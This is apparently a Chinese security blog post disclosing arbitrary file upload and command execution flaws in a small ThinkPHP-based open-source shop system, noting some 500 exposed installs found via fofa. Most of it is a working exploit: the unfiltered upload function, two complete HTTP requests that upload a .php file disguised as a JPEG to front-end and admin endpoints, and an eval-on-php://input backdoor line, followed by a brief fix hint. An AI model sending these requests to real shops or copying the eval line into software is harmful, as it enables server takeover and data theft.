某开源电商系统任意命令执行与任意上传漏洞

W.r 282 次浏览 0

商城采用thinkphp5.0+MySQL开发语言开发,完全开源商城系统,可以用于企业,个人建立自己的网上免费商城,支持开源微信商城,开源小程序等

这是偶然发现的一套程序。比较小众用的人数不是很多。根据fofa的搜索目测独立IP数量在500+左右
某开源电商系统任意命令执行与任意上传漏洞

前台后台任意文件上传

  public function updateUserImg($uid, $type){
        Log::write('开始更新会员头像');
        $condition = array(
            'uid' => $uid
        );
        
        $user_info = $this->user->getInfo($condition, $field = 'uid,qq_info,wx_info');
        $qq_info = $user_info['qq_info'];
        $wx_info = $user_info['wx_info'];

        if($type=='qq'){
            $qq_info_array = json_decode($qq_info, true);
     
            $user_head_img = $qq_info_array['figureurl_qq_2'];
        }elseif($type=='wchat'){
            //Log::write('微信信息: ' . $wx_info);
            $wx_info_array = json_decode($wx_info, true);
            $user_head_img = $wx_info_array['headimgurl'];

        }else{
            $user_head_img = '';
        }
        
        $local_path = '';
        if(!empty($user_head_img))
        {
            if(!file_exists('upload/user')){
                $mode = intval('0777',8);
                mkdir('upload/user',$mode,true);
                if(!file_exists('upload/user'))
                {
                    die('upload/user不可写,请检验读写权限!');
                }
            }
            $local_path = 'upload/user/'.time().rand(111,999).'.png';
            save_weixin_img($local_path, $user_head_img);
        }
        if(!empty($local_path))
        {
            $retval = $this->user->save(['user_headimg' => $local_path,], ['uid' => $uid]);
        }else{
            $retval = 0;
        }
        return $retval;
    }
    

未进行任何的过滤,导致任意文件写入

利用:

POST /index.php?s=/member/person HTTP/1.1
Host: xxxx
Content-Length: 924
Cache-Control: max-age=0
Origin: http://xxxx
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySuT4zF1iypR1XEll
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xxxx/index.php?s=/member/person
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tnvvs3e635nf8vc8bg7k7dcmh6; page_cookie=%7B%22page_index%22%3A1%2C%22show_number%22%3A%2214%22%2C%22url%22%3A%22http%3A%2F%2F120.79.244.0%2Findex.php%3Fs%3D%2Fadmin%2Fconfig%2Fshopnavigationlist%22%7D
Connection: close

------WebKitFormBoundarySuT4zF1iypR1XEll
Content-Disposition: form-data; name="user_headimg"; filename="5e5cbbe4725bb.php"
Content-Type: image/jpeg


------WebKitFormBoundarySuT4zF1iypR1XEll
Content-Disposition: form-data; name="act"

act_edit_img
------WebKitFormBoundarySuT4zF1iypR1XEll
Content-Disposition: form-data; name="submit2"

确认修改
------WebKitFormBoundarySuT4zF1iypR1XEll--

后台同样未进行任何的过滤

POST /index.php?s=/wap/upload/uploadfile HTTP/1.1
Host: xxxx
Content-Length: 73793
Cache-Control: max-age=0
Origin: http://xxxx
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryilA30KLVw3Nyddto
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://xxxx/index.php?s=/admin/auth/userdetail
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tnvvs3e635nf8vc8bg7k7dcmh6; page_cookie=%7B%22page_index%22%3A1%2C%22show_number%22%3A%2214%22%2C%22url%22%3A%22http%3A%2F%2F120.79.244.0%2Findex.php%3Fs%3D%2Fadmin%2Fconfig%2Fshopnavigationlist%22%7D
Connection: close

------WebKitFormBoundaryilA30KLVw3Nyddto
Content-Disposition: form-data; name="file_path"

upload/avator/
------WebKitFormBoundaryilA30KLVw3Nyddto
Content-Disposition: form-data; name="file_upload"; filename="5e5cbbe4725bb.php"
Content-Type: image/jpeg

xxxx
------WebKitFormBoundaryilA30KLVw3Nyddto--

任意命令执行后门

某开源电商系统任意命令执行与任意上传漏洞

eval('?>' . file_get_contents('php://input'));

某开源电商系统任意命令执行与任意上传漏洞

修复建议:直接删除phpunit 或者修改为stdin

发表评论 取消回复
表情 图片 链接 代码